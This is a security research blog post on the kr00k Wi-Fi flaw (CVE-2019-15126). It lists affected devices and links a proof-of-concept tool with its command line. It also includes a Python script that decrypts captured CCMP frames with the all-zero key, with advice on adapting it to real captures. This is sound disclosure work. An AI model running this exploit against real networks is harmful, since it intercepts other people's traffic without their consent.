r00kie-kr00kie. Exploring the kr00k attack



We created and published a PoC exploit of the kr00k attack (CVE-2019-15126): https://github.com/hexway/r00kie-kr00kie

All technical details can be found in the Process section.


In February 2020, ESET published the whitepaper KR00K - CVE-2019-15126: SERIOUS VULNERABILITY DEEP INSIDE YOUR WI-FI ENCRYPTION. The vulnerability works as follows:

  1. The victim connects to a WiFi hotspot.
  2. The adversary sends disassociation frames to the client and, by doing so, disconnects the victim from the hotspot.
  3. The client's WiFi chip (the Wireless Network Interface Controller, WNIC) clears the session key (the Temporal Key, TK) used to encrypt and decrypt traffic, i.e. sets it to all zeros.
  4. However, data packets that are still queued in the chip's transmit buffer at the moment of disassociation are encrypted with this all-zero key and transmitted anyway.
  5. The adversary captures the packets the victim sends after the disassociation and decrypts them with the now-known key (all zeros).


Figure 1. The attack flow, in the diagram we took from ESET's whitepaper (not obvious at first glance, but clear once you look closely)
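Step 5 in code, as an added example that is not hexway's r00kie-kr00kie script or ESET's code: it parses a CCMP-protected 802.11 data frame, rebuilds the CCM nonce and AAD from the MAC header, and tries to decrypt with the all-zero TK. Decryption only succeeds (the 8-byte MIC verifies) when the frame really was encrypted under the zeroed key, so a None result on a frame captured right after the disassociation means the device did not leak. It uses the `cryptography` package's AES-CCM and a constructed sample frame (the BSSID and client MAC are the ones from the PoC invocation on this page; the destination MAC and payload are made up), and it handles only non-QoS, three-address frames without FCS.

```python
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESCCM

ZERO_TK = bytes(16)      # the all-zero Temporal Key left behind after the chip clears its key
CCMP_MIC_LEN = 8         # CCMP uses a 64-bit MIC


def mac(addr: str) -> bytes:
    return bytes.fromhex(addr.replace(":", ""))


def split_frame(frame: bytes):
    """Split a non-QoS, three-address CCMP data frame (no FCS) into
    (mac_header, ccmp_header, ciphertext, mic)."""
    if len(frame) < 32 + CCMP_MIC_LEN + 1:
        raise ValueError("frame too short for MAC header, CCMP header, data and MIC")
    fc0, fc1 = frame[0], frame[1]
    if (fc0 & 0x0C) != 0x08:
        raise ValueError("not a data frame")
    if fc0 & 0x80:
        raise ValueError("QoS data frames are not handled in this example")
    if (fc1 & 0x03) == 0x03:
        raise ValueError("four-address frames are not handled in this example")
    if not fc1 & 0x40:
        raise ValueError("Protected Frame bit not set, nothing to decrypt")
    hdr, ccmp, body = frame[:24], frame[24:32], frame[32:]
    if not ccmp[3] & 0x20:
        raise ValueError("ExtIV bit clear, not a CCMP-encrypted frame")
    return hdr, ccmp, body[:-CCMP_MIC_LEN], body[-CCMP_MIC_LEN:]


def ccmp_nonce(hdr: bytes, ccmp: bytes) -> bytes:
    """Nonce = priority (0 for non-QoS) || A2 || PN as a 48-bit big-endian number.
    The CCMP header stores PN0, PN1, reserved, KeyID/ExtIV, PN2..PN5."""
    pn = bytes([ccmp[7], ccmp[6], ccmp[5], ccmp[4], ccmp[1], ccmp[0]])
    return b"\x00" + hdr[10:16] + pn


def ccmp_aad(hdr: bytes) -> bytes:
    """AAD = masked Frame Control || A1 || A2 || A3 || masked Sequence Control."""
    fc0 = hdr[0] & 0x8F                 # subtype bits 4-6 masked to 0
    fc1 = (hdr[1] & 0x07) | 0x40        # keep ToDS/FromDS/MoreFrag, force Protected, clear the rest
    sc = bytes([hdr[22] & 0x0F, 0x00])  # keep fragment number, zero the sequence number
    return bytes([fc0, fc1]) + hdr[4:22] + sc


def decrypt_frame(frame: bytes, tk: bytes = ZERO_TK):
    """Return the decrypted MSDU (LLC/SNAP + payload) if `tk` authenticates the
    frame, else None. With the default all-zero TK this is the kr00k check."""
    hdr, ccmp, ct, mic = split_frame(frame)
    aead = AESCCM(tk, tag_length=CCMP_MIC_LEN)
    try:
        return aead.decrypt(ccmp_nonce(hdr, ccmp), ct + mic, ccmp_aad(hdr))
    except InvalidTag:
        return None


def build_frame(hdr: bytes, pn: int, msdu: bytes, tk: bytes) -> bytes:
    """Encrypt an MSDU under `tk` and emit header || CCMP header || ciphertext || MIC.
    Only used here to construct sample captures; a real PoC sniffs them off the air."""
    ccmp = bytes([pn & 0xFF, (pn >> 8) & 0xFF, 0x00, 0x20,        # PN0, PN1, rsvd, ExtIV|KeyID 0
                  (pn >> 16) & 0xFF, (pn >> 24) & 0xFF,
                  (pn >> 32) & 0xFF, (pn >> 40) & 0xFF])
    aead = AESCCM(tk, tag_length=CCMP_MIC_LEN)
    return hdr + ccmp + aead.encrypt(ccmp_nonce(hdr, ccmp), msdu, ccmp_aad(hdr))


# Constructed sample: a client->AP data frame using the addresses from the PoC command line.
SAMPLE_HEADER = (
    bytes([0x08, 0x41])            # Frame Control: type Data, subtype 0, ToDS=1, Protected=1
    + bytes([0x00, 0x00])          # Duration
    + mac("D4:38:9C:82:23:7A")     # A1: BSSID / receiver
    + mac("88:C9:D0:FB:88:D1")     # A2: the victim client / transmitter
    + mac("00:11:22:33:44:55")     # A3: destination address (constructed)
    + bytes([0x20, 0x01])          # Sequence Control: fragment 0, sequence number 0x12
)
SAMPLE_MSDU = bytes.fromhex("aaaa030000000800") + b"constructed UDP payload from the victim"
LEAKED_FRAME = build_frame(SAMPLE_HEADER, 0x2A, SAMPLE_MSDU, ZERO_TK)           # as sent after disassociation
NORMAL_FRAME = build_frame(SAMPLE_HEADER, 0x2B, SAMPLE_MSDU, bytes(range(16)))  # as sent with a real TK

if __name__ == "__main__":
    print("leaked frame :", decrypt_frame(LEAKED_FRAME))   # the MSDU in clear
    print("normal frame :", decrypt_frame(NORMAL_FRAME))   # None, MIC check fails
```

On a real capture from a monitor-mode interface most client traffic arrives as QoS data frames (subtype bit 7 set): the MAC header is then 26 bytes with a 2-byte QoS Control field, the CCMP header starts at offset 26, the nonce's first byte is the TID from QoS Control, and the AAD gains the masked QoS Control field. Extending split_frame/ccmp_nonce/ccmp_aad for that case is the first thing to do before pointing this at a pcap.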


The following devices were claimed vulnerable:

  • Amazon Echo 2nd gen
  • Amazon Kindle 8th gen
  • Apple iPad mini 2
  • Apple iPhone 6, 6S, 8, XR
  • Apple MacBook Air Retina 13-inch 2018
  • Google Nexus 5
  • Google Nexus 6
  • Google Nexus 6P
  • Raspberry Pi 3
  • Samsung Galaxy S4 GT-I9505
  • Samsung Galaxy S8
  • Xiaomi Redmi 3S

So, since we have a Raspberry Pi 3 ready at hand, let's find out whether kr00k actually works. Surely, ESET researchers or some community members have already published a PoC, haven't they?


Umm, Google found nothing but a pile of FUD and an empty GitHub repository.

Ok, let's make it ourselves.

UPDATE: while we were drawing the logo for this publication, Thice Security posted a PoC as well.


The kr00k attack is quite straightforward. So, it didn't take much time for us to write our PoC.

To check whether a device is vulnerable, it suffices to run the r00kie-kr00kie.py Python script with the wireless interface (-i), the BSSID (-b), the victim's MAC address (-c) and the channel number (-l) as parameters, and to have a bit of patience:

  python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11


After testing this PoC on different devices, we found that the data of clients generating plenty of UDP traffic was the easiest to intercept. Among such clients are, for example, various streaming apps, because this kind of traffic (unlike small TCP packets) will always be kept in the buffer of the WiFi chip.

By the way, here are another couple of devices we used to prove the attack works:

  • Sony Xperia Z3 Compact (D5803)
  • Huawei Honor 4X

All in all, now you have another tool you can use during one of your Red Team projects or security assessments of your clients' WiFi networks: https://github.com/hexway/r00kie-kr00kie

Do not forget to have a look at the Process section. There you'll find more details about this PoC development and the way it works.

You are welcome!


Source: https://hexway.io/research/r00kie-kr00kie/
